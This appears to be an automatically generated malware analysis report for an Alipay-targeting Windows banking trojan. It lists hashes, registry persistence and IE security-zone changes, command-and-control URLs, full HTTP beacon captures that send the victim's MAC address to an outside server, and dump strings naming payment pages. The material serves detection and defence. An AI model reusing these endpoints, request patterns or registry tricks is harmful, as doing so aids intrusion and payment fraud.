Trojan.GenericKD.2249578_07fd8bc3e2

by malwarelabrobot on April 2nd, 2015 in Malware Descriptions.

Trojan.GenericKD.2249578 (B) (Emsisoft), Trojan.GenericKD.2249578 (AdAware), GenericEmailWorm.YR, TrojanFlyStudio.YR, BankerGeneric.YR (Lavasoft MAS)
Behaviour: Banker, Trojan, Worm, EmailWorm


The description has been automatically generated by Lavasoft Malware Analysis System and it may contain incomplete or inaccurate information.

Requires JavaScript enabled!

Summary
Dynamic Analysis
Static Analysis
Network Activity
Map
Strings from Dumps
Removals

MD5: 07fd8bc3e2c460e17ad8a37c2f7dcf71
SHA1: f96243e4be9968625ff1977543681821967ab1d8
SHA256: 2494356cdf0a21950b75e365f9480cede5f3a1bd3b5a760b89bb935558118223
SSDeep: 49152:KNPDqXMXmf1UGXkVaW4mxDulVXN6kPof:DcXz2kVafqulV96kPof
Size: 2383872 bytes
File type: EXE
Platform: WIN32
Entropy: Not Packed
PEID: MicrosoftVisualC50, MicrosoftVisualC, MicrosoftVisualCv50v60MFC, Armadillov171, UPolyXv05_v6
Company: StdLib
Created at: 2015-03-15 10:03:33
Analyzed on: WindowsXP SP3 32-bit


Summary:

Trojan. A program that appears to do one thing but actually does another (a.k.a. Trojan Horse).

Payload

Behaviour Description
EmailWorm Worm can send e-mails.


Process activity

The Trojan creates the following process(es):

%original file name%.exe:348

The Trojan injects its code into the following process(es):
No processes have been created.

Mutexes

The following mutexes were created/opened:
No objects were found.

File activity

The process %original file name%.exe:348 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\My Documents\alipay_jmp.txt (135 bytes)
C:\UUWiseHelper.dll (290 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\desktop.ini (67 bytes)

Registry activity

The process %original file name%.exe:348 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

"Personal" = "%Documents and Settings%\%current user%\My Documents"
"Cookies" = "%Documents and Settings%\%current user%\Cookies"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"

[HKCU\Software\Microsoft\Internet Explorer\BrowserEmulation\ClearableListData]
"UserFilter" = "41 1F 00 00 53 08 AD BA 01 00 00 00 32 00 00 00"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKCR\TypeLib\{1EA4DBF0-3C3B-11CF-810C-00AA00389B71}\1.1\0\win32]
"(Default)" = "%System%\oleacc.dll"

[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"

[HKCU]
"alipay_hwnd" = "1638622"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 1D 00 00 00 01 00 00 00 00 00 00 00"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "54 9F 70 B9 B5 4D F4 CA 48 79 50 12 B9 FF D9 F1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"

[HKCU\Software\Tencent\QQBrowser\Advanced]
"EnableChromeTab" = "0"

The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"

The Trojan modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:

"ProxyBypass" = "1"

Proxy settings are disabled:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

The Trojan modifies IE settings for security zones to map all urls to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"

To automatically run itself each time Windows is booted, the Trojan adds the following link to its file to the system registry autorun key:

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"alipay" = "c:\%original file name%.exe"

The Trojan deletes the following value(s) in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"

Dropped PE files

MD5 File path
afd14de763f7c540e686afdc55281039 c:\UUWiseHelper.dll

HOSTS file anomalies

No changes have been detected.

Rootkit activity

No anomalies have been detected.

Propagation

VersionInfo

No information is available.

PE Sections

Name Virtual Address Virtual Size Raw Size Entropy Section MD5
.text 4096 1025359 1028096 4.5629 f7279607e8fc344535125fc61a1364a1
.rdata 1032192 1215612 1216512 4.25382 d54b02a3965caadaa04bfcc027da235c
.data 2248704 302730 98304 3.74499 d5beb10cdb7ac993a77fef1745a94747
.rsrc 2551808 36416 36864 3.58565 2110b7b5888adc8dda4dc0f042f1526e

Dropped from:

Downloaded by:

Similar by SSDeep:

Similar by Lavasoft Polymorphic Checker:

URLs

URL IP
hxxp://174.139.10.150/update/check.php?check=1.3
hxxp://s1.uuwise.com/Api/config.aspx 116.255.181.152
hxxp://lb.uudama.com/Api/VerifyAPIFile.aspx 113.107.181.46
hxxp://lb.uudama.com/Api/UserLogin.aspx 113.107.181.46
hxxp://lb.uudama.com/Api/UserPoint.aspx 113.107.181.46
hxxp://www.api666.com/s_sc.php?mac=00-0C-29-8E-22-D8&client=3032273022523032253032133022603032461.3&gsd=303216303232302277303213303200302274 174.139.10.150
hxxp://www.api666.com/test.txt 174.139.10.150
hxxp://www.api666.com/s_start.php?mac=00-0C-29-8E-22-D8 174.139.10.150
hxxp://www.api666.com/s_getbox.php?mac=00-0C-29-8E-22-D8 174.139.10.150
hxxp://www.api666.com/s_sc.php?mac=00-0C-29-8E-22-D8&client=............1.3&gsd=............ 174.139.10.150
hxxp://www.api666.com/update/check.php?check=1.3 174.139.10.150
1.cn.pool.ntp.org 202.118.1.81
cn.pool.ntp.org 202.112.31.197
www.baidu.com 180.76.3.151
0.cn.pool.ntp.org 202.112.10.36
2.cn.pool.ntp.org 202.112.31.197
3.cn.pool.ntp.org 202.112.31.197


IDS verdicts (Suricata alerts: Emerging Threats ET ruleset)

ET POLICY Software Install Reporting via HTTP - Wise User Agent (Wise) Sometimes Malware Related

Traffic

POST /Api/VerifyAPIFile.aspx HTTP/1.1
User-Agent: VersionClient
Cache-Control: no-cache
Accept: */*
TTL: 1427902891209
Content-Type: multipart/form-data; boundary=-------------aabbccddeeff007dc3d73a70130
Content-Length: 411
Host: lb.uudama.com
Connection: Keep-Alive

---------------aabbccddeeff007dc3d73a70130
Content-Disposition: form-data; name="SID"

2097
---------------aabbccddeeff007dc3d73a70130
Content-Disposition: form-data; name="Info"

449AA4D5026EF9F69DABB21D88F3E48D5BF5C582E09500EA5EB6004963E12D064C7056FFCD9F6D4A3234818CBBD7F9BEA51ECD2143FD05AC13B22AF4A008E145D45497F0D4AA397BAD5D995D49C9FBE1F2D5A3BFF89CBB65
---------------aabbccddeeff007dc3d73a70130--

HTTP/1.1 200 OK
Server: nginx
Date: Wed, 01 Apr 2015 15:40:43 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 96
Connection: keep-alive
ServerV: 10043
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=errw3c454axfofnjx0vt5i45; path=/; HttpOnly
Cache-Control: private
24664F2554DDE337A2836DF3C253569DF6F31FF43DF8EA44FC6D7F086349C98773530F
5133CD51B37DDD4C3725BB6ACB....


POST /Api/UserLogin.aspx HTTP/1.1


User-Agent: WiseClientAPI-2.0.0.4
Version: 2.0.0.4
HASH: afd14de763f7c540e686afdc55281039
Cache-Control: no-cache
Accept: */*
TTL: 1427902895803
Content-Type: multipart/form-data; boundary=-------------aabbccddeeff007dc3d73a70130
Content-Length: 715
Host: lb.uudama.com
Connection: Keep-Alive

---------------aabbccddeeff007dc3d73a70130
Content-Disposition: form-data; name="InitTTL"

1427902888412
---------------aabbccddeeff007dc3d73a70130
Content-Disposition: form-data; name="SID"

2097
---------------aabbccddeeff007dc3d73a70130
Content-Disposition: form-data; name="NAME"

yexingzhe
---------------aabbccddeeff007dc3d73a70130
Content-Disposition: form-data; name="PASS"

EFF0F22544B04226BABA0D48195CB738
---------------aabbccddeeff007dc3d73a70130
Content-Disposition: form-data; name="INFO"

53F117A35BB9FB72B8794AD99C32C670DA1CE9477251DF95C3A439EA60D907977C5D06144FA4A75A0911A2CA163286F1DBB69B9831D6966145AF8B72BC088D99A76E37DC94FA128E
---------------aabbccddeeff007dc3d73a70130--

HTTP/1.1 200 OK
Server: nginx
Date: Wed, 01 Apr 2015 15:40:47 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 448
Connection: keep-alive
ServerV: 10043
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=km2i1j55jei43rfrptpqqo2d; path=/; HttpOnly
Cache-Control: private
90FA3BD8B8F4C0FB5C8C0C32C99E75E8CFD80087C8E39FF35921E36C16F0E40851E736
39FB007CC68C895BF5ABC12F4C90574383EC3C2402D3D229C4D6F72DA07E1167D21E09
E155CF0AB2CAAC0B79BEF19A359F69A109126918A97FF79F775BBDC5C085FF09192A1C
143AC6D27286E214D257F494D493CA2357972114F47C30AAE3CAF1CA680A9528E9769B
368F781C150C0D4E3DF959459901F3BC40432FECDE44CBD76F905960801DB903F43EEA
5A7D4F078F66E632BA753398903170661EC6262B45B85BFB3D8F49E38632FB12FC1B83
EC57D18D8A550B505D6AC97E9A85....


POST /Api/UserPoint.aspx HTTP/1.1


User-Agent: WiseClientAPI-2.0.0.4
Version: 2.0.0.4
HASH: afd14de763f7c540e686afdc55281039
Cache-Control: no-cache
Accept: */*
TTL: 1427902896709
Content-Type: multipart/form-data; boundary=-------------aabbccddeeff007dc3d73a70130
Content-Length: 1131
Host: lb.uudama.com
Connection: Keep-Alive

---------------aabbccddeeff007dc3d73a70130
Content-Disposition: form-data; name="InitTTL"

1427902888412
---------------aabbccddeeff007dc3d73a70130
Content-Disposition: form-data; name="SID"

2097
---------------aabbccddeeff007dc3d73a70130
Content-Disposition: form-data; name="Name"

yexingzhe
---------------aabbccddeeff007dc3d73a70130
Content-Disposition: form-data; name="Pass"

0F9FA1A753ED4B73A5AAAFF1470CAD82
---------------aabbccddeeff007dc3d73a70130
Content-Disposition: form-data; name="INFO"

CFB6490440EC58A8583E7CCE45CAA1E2FF40F971D5749BFDA033170E3DECBFABE04F61FE852DD0A5BB5C8FD21537922932F6A929A2CBB8E9C849A8777BC146413DA9A57AED4B6A70C2EF34B7225167955D9A2AC387A33097DBEAA9A98E37A30061745AF70F74D6E9A107EF5ABB1C14AA8061ABD5E231927DAC73209B88E8D999D99BD62D160264101E259CE5CB006D2EFB6A9571F65D7D73273949874C7EB6893D40ABA2F0BD7E0EC04509C39CAFC3662562A4655CD99884AF04443C534A752E87AEE4CEAF5FA17EA65F8B5AEAE6B64E74D9D204637C3B39A51B4C2C42A9F9807FA744E0BC5026970F87949CBABA945796B024AE5F693B46391B82E4FDE81D3B58CD42BE323AEFFA5EAAD82EE3B539FC7CF0C7C0D4802A76
---------------aabbccddeeff007dc3d73a70130--

HTTP/1.1 200 OK
Server: nginx
Date: Wed, 01 Apr 2015 15:40:48 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 32
Connection: keep-alive
ServerV: 10042
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=isbsanbcme1d0oayrfsbua45; path=/; HttpOnly
Cache-Control: private
B7C330AFD0695F577B7CF17F1949442F....


POST /Api/UserPoint.aspx HTTP/1.1


User-Agent: WiseClientAPI-2.0.0.4
Version: 2.0.0.4
HASH: afd14de763f7c540e686afdc55281039
Cache-Control: no-cache
Accept: */*
TTL: 1427902897100
Content-Type: multipart/form-data; boundary=-------------aabbccddeeff007dc3d73a70130
Content-Length: 1163
Host: lb.uudama.com
Connection: Keep-Alive

---------------aabbccddeeff007dc3d73a70130
Content-Disposition: form-data; name="InitTTL"

1427902888412
---------------aabbccddeeff007dc3d73a70130
Content-Disposition: form-data; name="SID"

2097
---------------aabbccddeeff007dc3d73a70130
Content-Disposition: form-data; name="Name"

yexingzhe
---------------aabbccddeeff007dc3d73a70130
Content-Disposition: form-data; name="Pass"

85AEC333149A4BDE89478991F6BF38DB
---------------aabbccddeeff007dc3d73a70130
Content-Disposition: form-data; name="INFO"

C184C9A78BFF61093CEF47F8371E5525D9745C83574220B9F02FD6BE1CBCB371FA9527D93AE5F4D522215FF69311C7440EC8D4D3869F10C6640109694F8594D9EAE5163999F2EDE275ED63A982B36EE7E399379FD2A9E96E8D0A54AC7187182C0855505F3E14E30C07E97D5F3BE8CB80DFF6F062E80B4BDEBB191A126027D811191EC6F3E62A2462CE7764282B6B47D6D2E2A5A206C4F750A093D2225CCB06D24118D02829B2AA44CFC7C66C81222AE3EA70CAB8131D822225932740430BD6D96635A0F952386B2BF8C928D1736FEAE5276056809B7C5E4438EB10F53D2E0949BB985FDEAC093ECADED90B5D1C82C93459F2A3A84120D11F1772869606E1C03624D1F4A7CB3811F54580D4050EBAC7D4DA6389ACCF0FB11EC9C78C550B026EDB7C148009C744338D
---------------aabbccddeeff007dc3d73a70130--

HTTP/1.1 200 OK
Server: nginx
Date: Wed, 01 Apr 2015 15:40:49 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 32
Connection: keep-alive
ServerV: 10034
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=0hnlrqaqa4bquqy5fov5fb55; path=/; HttpOnly
Cache-Control: private
FBD18BEAEAB719B13CB86C11C616EDA7..



GET /test.txt HTTP/1.1
Referer: hXXp://VVV.api666.com/test.txt
Accept: */*
Accept-Language: zh-cn
User-Agent: Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; 125LA; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)
Content-Type: application/x-www-form-urlencoded
Host: VVV.api666.com
Connection: Keep-Alive


HTTP/1.1 200 OK
Date: Wed, 01 Apr 2015 15:42:26 GMT
Content-Length: 2
Content-Type: text/plain
Content-Location: hXXp://VVV.api666.com/test.txt
Last-Modified: Sat, 21 Mar 2015 09:35:57 GMT
Accept-Ranges: bytes
ETag: "f2eb806fba63d01:471cb"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
ok....


GET /s_start.php?mac=00-0C-29-8E-22-D8 HTTP/1.1


Referer: hXXp://VVV.api666.com/s_start.php?mac=00-0C-29-8E-22-D8
Accept: */*
Accept-Language: zh-cn
User-Agent: Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; 125LA; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)
Content-Type: application/x-www-form-urlencoded
Host: VVV.api666.com
Connection: Keep-Alive


HTTP/1.1 200 OK
Connection: close
Date: Wed, 01 Apr 2015 15:42:26 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.17
Content-Type:text/html;charset=gb2312
no..



GET /s_sc.php?mac=00-0C-29-8E-22-D8&client=............1.3&gsd=............ HTTP/1.1
Referer: hXXp://VVV.api666.com/s_sc.php?mac=00-0C-29-8E-22-D8&client=......1.3&gsd=......
Accept: */*
Accept-Language: zh-cn
User-Agent: Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; 125LA; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)
Content-Type: application/x-www-form-urlencoded
Host: VVV.api666.com
Connection: Keep-Alive


HTTP/1.1 200 OK
Connection: close
Date: Wed, 01 Apr 2015 15:42:26 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.17
Content-Type:text/html;charset=gb2312



GET /s_sc.php?mac=00-0C-29-8E-22-D8&client=............1.3&gsd=............ HTTP/1.1
Referer: hXXp://VVV.api666.com/s_sc.php?mac=00-0C-29-8E-22-D8&client=......1.3&gsd=......
Accept: */*
Accept-Language: zh-cn
User-Agent: Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; 125LA; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)
Content-Type: application/x-www-form-urlencoded
Host: VVV.api666.com
Connection: Keep-Alive


HTTP/1.1 200 OK
Connection: close
Date: Wed, 01 Apr 2015 15:42:11 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.17
Content-Type:text/html;charset=gb2312



GET /test.txt HTTP/1.1
Referer: hXXp://VVV.api666.com/test.txt
Accept: */*
Accept-Language: zh-cn
User-Agent: Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; 125LA; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)
Content-Type: application/x-www-form-urlencoded
Host: VVV.api666.com
Connection: Keep-Alive


HTTP/1.1 200 OK
Date: Wed, 01 Apr 2015 15:41:56 GMT
Content-Length: 2
Content-Type: text/plain
Content-Location: hXXp://VVV.api666.com/test.txt
Last-Modified: Sat, 21 Mar 2015 09:35:57 GMT
Accept-Ranges: bytes
ETag: "f2eb806fba63d01:471cb"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
ok....


GET /s_start.php?mac=00-0C-29-8E-22-D8 HTTP/1.1


Referer: hXXp://VVV.api666.com/s_start.php?mac=00-0C-29-8E-22-D8
Accept: */*
Accept-Language: zh-cn
User-Agent: Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; 125LA; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)
Content-Type: application/x-www-form-urlencoded
Host: VVV.api666.com
Connection: Keep-Alive


HTTP/1.1 200 OK
Connection: close
Date: Wed, 01 Apr 2015 15:41:56 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.17
Content-Type:text/html;charset=gb2312
no..



GET /update/check.php?check=1.3 HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)
Accept: */*
Host: VVV.api666.com
Cache-Control: no-cache


HTTP/1.1 200 OK
Connection: close
Date: Wed, 01 Apr 2015 15:41:43 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.17
Content-type: text/html



GET /test.txt HTTP/1.1
Referer: hXXp://VVV.api666.com/test.txt
Accept: */*
Accept-Language: zh-cn
User-Agent: Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; 125LA; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)
Content-Type: application/x-www-form-urlencoded
Host: VVV.api666.com
Connection: Keep-Alive


HTTP/1.1 200 OK
Date: Wed, 01 Apr 2015 15:42:11 GMT
Content-Length: 2
Content-Type: text/plain
Content-Location: hXXp://VVV.api666.com/test.txt
Last-Modified: Sat, 21 Mar 2015 09:35:57 GMT
Accept-Ranges: bytes
ETag: "f2eb806fba63d01:471cb"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
ok....


GET /s_start.php?mac=00-0C-29-8E-22-D8 HTTP/1.1


Referer: hXXp://VVV.api666.com/s_start.php?mac=00-0C-29-8E-22-D8
Accept: */*
Accept-Language: zh-cn
User-Agent: Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; 125LA; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)
Content-Type: application/x-www-form-urlencoded
Host: VVV.api666.com
Connection: Keep-Alive


HTTP/1.1 200 OK
Connection: close
Date: Wed, 01 Apr 2015 15:42:11 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.17
Content-Type:text/html;charset=gb2312
no..



GET /s_getbox.php?mac=00-0C-29-8E-22-D8 HTTP/1.1
Referer: hXXp://VVV.api666.com/s_getbox.php?mac=00-0C-29-8E-22-D8
Accept: */*
Accept-Language: zh-cn
User-Agent: Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; 125LA; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)
Content-Type: application/x-www-form-urlencoded
Host: VVV.api666.com
Connection: Keep-Alive


HTTP/1.1 200 OK
Connection: close
Date: Wed, 01 Apr 2015 15:42:12 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.17
Content-type: text/html
----..



GET /s_getbox.php?mac=00-0C-29-8E-22-D8 HTTP/1.1
Referer: hXXp://VVV.api666.com/s_getbox.php?mac=00-0C-29-8E-22-D8
Accept: */*
Accept-Language: zh-cn
User-Agent: Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; 125LA; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)
Content-Type: application/x-www-form-urlencoded
Host: VVV.api666.com
Connection: Keep-Alive


HTTP/1.1 200 OK
Connection: close
Date: Wed, 01 Apr 2015 15:41:57 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.17
Content-type: text/html
----..



POST /Api/config.aspx HTTP/1.1
User-Agent: WiseClientAPI-2.0.0.4
Version: 2.0.0.4
HASH: afd14de763f7c540e686afdc55281039
Cache-Control: no-cache
Accept: */*
TTL: 1427902888443
Content-Type: multipart/form-data; boundary=-------------aabbccddeeff007dc3d73a70130
Content-Length: 376
Host: s1.uuwise.com
Connection: Keep-Alive

---------------aabbccddeeff007dc3d73a70130
Content-Disposition: form-data; name="HASH"

50FB130BCA1FFB4B2C642C8E94620915
---------------aabbccddeeff007dc3d73a70130
Content-Disposition: form-data; name="SID"

2097
---------------aabbccddeeff007dc3d73a70130
Content-Disposition: form-data; name="InitTTL"

1427902888412
---------------aabbccddeeff007dc3d73a70130--

HTTP/1.1 200 OK
Date: Wed, 01 Apr 2015 15:41:45 GMT
Server: Microsoft-IIS/6.0
ServerV: 10035
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=ls0cgemfccjrhfnhkldqov55; path=/; HttpOnly
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 176
313030302C6C622E757564616D612E636F6D3A38303A3130312C7570622E7575776973
652E636F6D3A38303A3130322C7570622E7575776973652E636F6D3A38303A3130332C
7C307C39312E3230302E3135392E31333120..



GET /s_sc.php?mac=00-0C-29-8E-22-D8&client=............1.3&gsd=............ HTTP/1.1
Referer: hXXp://VVV.api666.com/s_sc.php?mac=00-0C-29-8E-22-D8&client=......1.3&gsd=......
Accept: */*
Accept-Language: zh-cn
User-Agent: Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; 125LA; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)
Content-Type: application/x-www-form-urlencoded
Host: VVV.api666.com
Connection: Keep-Alive


HTTP/1.1 200 OK
Connection: close
Date: Wed, 01 Apr 2015 15:41:56 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.17
Content-Type:text/html;charset=gb2312
add..



GET /s_sc.php?mac=00-0C-29-8E-22-D8&client=............1.3&gsd=............ HTTP/1.1
Referer: hXXp://VVV.api666.com/s_sc.php?mac=00-0C-29-8E-22-D8&client=......1.3&gsd=......
Accept: */*
Accept-Language: zh-cn
User-Agent: Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; 125LA; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)
Content-Type: application/x-www-form-urlencoded
Host: VVV.api666.com
Connection: Keep-Alive


HTTP/1.1 200 OK
Connection: close
Date: Wed, 01 Apr 2015 15:42:41 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.17
Content-Type:text/html;charset=gb2312



GET /s_getbox.php?mac=00-0C-29-8E-22-D8 HTTP/1.1
Referer: hXXp://VVV.api666.com/s_getbox.php?mac=00-0C-29-8E-22-D8
Accept: */*
Accept-Language: zh-cn
User-Agent: Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; 125LA; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)
Content-Type: application/x-www-form-urlencoded
Host: VVV.api666.com
Connection: Keep-Alive


HTTP/1.1 200 OK
Connection: close
Date: Wed, 01 Apr 2015 15:42:27 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.17
Content-type: text/html
----..







The Trojan connects to the servers at the folowing location(s):







%original file name%.exe_348:




.text
`.rdata
@.data
.rsrc
t%SVh
t$(SSh
~%UVW
u$SShe
UUWiseHelper.dll
ole32.dll
user32.dll
OLEACC.DLL
kernel32.dll
wininet.dll
uu_loginA
yexingzhe|,|yexingzhe|,|[email protected]\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\
VVV.baidu.com
32F1C86B-E64C-4EAF-8BC1-C142570008BC
\UUWiseHelper.dll
@.reloc
SSSSh
ByScreen.JPG
operator
GetProcessWindowStation
E:\work\UUWiseHelper
\UUWiseHelper.pdb
KERNEL32.dll
USER32.dll
GDI32.dll
RegCloseKey
RegOpenKeyExW
ADVAPI32.dll
SHELL32.dll
OLEAUT32.dll
SHLWAPI.dll
urlmon.dll
dbghelp.dll
gdiplus.dll
IPHLPAPI.DLL
WS2_32.dll
GetProcessHeap
GetCPInfo
UUWiseHelper.DLL
uu_easyRecognizeUrlA
uu_easyRecognizeUrlW
uu_loginW
uu_recognizeByCodeTypeAndUrlA
uu_recognizeByCodeTypeAndUrlW
uu_reportError
zcÁ
<requestedExecutionLevel level="asInvoker" uiAccess="false"></requestedExecutionLevel>
0(1,10141
9 9<9@9`9
:-1014,URL
:-19011,
TEAKEY
my.alipay.com
consumeprod.alipay.com
fastpaycashier.htm
ebankpay.htm
<form name="ebankPayForm" id="ebankPayForm" method="POST" action="ebankPay.htm" target="_blank">
WinHttp.WinHttpRequest.5.1
User-Agent: Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; 125LA; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)
Content-Type: application/x-www-form-urlencoded
hXXp://cashier.alipay.com/standard/payment/cashier.htm?orderId=
hXXp://VVV.api666.com/
hXXp://VVV.ip.cn/
SQLite format 3
CREATE TABLE tblSwitcher(key LONGVARCHAR,pattern LONGVARCHAR NOT NULL,type INTEGER NOT NULL,flag INTEGER DEFAULT 0 NOT NULL,set_time INTEGER NOT NULL,action INTEGER NOT NULL DEFAULT 1,primary key(key, pattern))5
indexsqlite_autoindex_tblSwitcher_1tblSwitcher
CREATE TABLE meta(key LONGVARCHAR NOT NULL UNIQUE PRIMARY KEY, value LONGVARCHAR)'
indexsqlite_autoindex_meta_1meta
alipay.comconsumeprod.alipay.com
alipay.commy.alipay.com
alipay.comcashierztg.alipay.com
alipay.comcashierzue.alipay.com
alipay.comcashierzth.alipay.com
alipay.comfinanceprod.alipay.com
alipay.comshenghuo.alipay.com
alipay.comVVV.alipay.com
MCPattern3.db
CtableMultiCorePatternUrlMultiCorePatternUrl
CREATE TABLE MultiCorePatternUrl (url VARCHAR(1024) default 0,client_id INTEGER default -1)
CREATE TABLE MultiCorePattern (dirty INTEGER default 1,server_id VARCHAR(1024),client_id INTEGER PRIMARY KEY,coretype INTEGER default 0)-
indexsqlite_autoindex_db_info_1db_info
CREATE TABLE db_info (id VARCHAR(1024) PRIMARY KEY,value VARCHAR(1024),reserved INT
hXXps://my.alipay.com/portal/i.htm/
hXXps://lab.alipay.com/user/navigate.htm/
